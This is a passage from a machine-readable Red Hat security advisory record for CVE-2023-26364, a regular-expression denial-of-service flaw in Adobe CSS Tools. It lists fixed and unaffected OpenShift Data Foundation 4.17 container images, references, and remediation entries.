"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2250364", }, ], notes: [ { category: "description", text: "A flaw was found in Adobe CSS Tools. An improper input validation could result in a minor denial of service while parsing a malicious CSS with the parse component. User interaction and privileges are not required to jeopardize an environment.", title: "Vulnerability description", }, { category: "summary", text: "css-tools: Improper Input Validation causes Denial of Service via Regular Expression", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", ], known_not_affected: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2023-26364", }, { category: "external", summary: "RHBZ#2250364", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2250364", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2023-26364", url: "https://www.cve.org/CVERecord?id=CVE-2023-26364", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2023-26364", url: "https://nvd.nist.gov/vuln/detail/CVE-2023-26364", }, { category: "external", summary: "https://github.com/adobe/css-tools/security/advisories/GHSA-hpx4-r86g-5jrg", url: "https://github.com/adobe/css-tools/security/advisories/GHSA-hpx4-r86g-5jrg", }, ], release_date: "2023-11-17T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-30T14:25:22+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:8676", }, { category: "workaround", details: "No mitigation is yet available for this vulnerability.", product_ids: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", 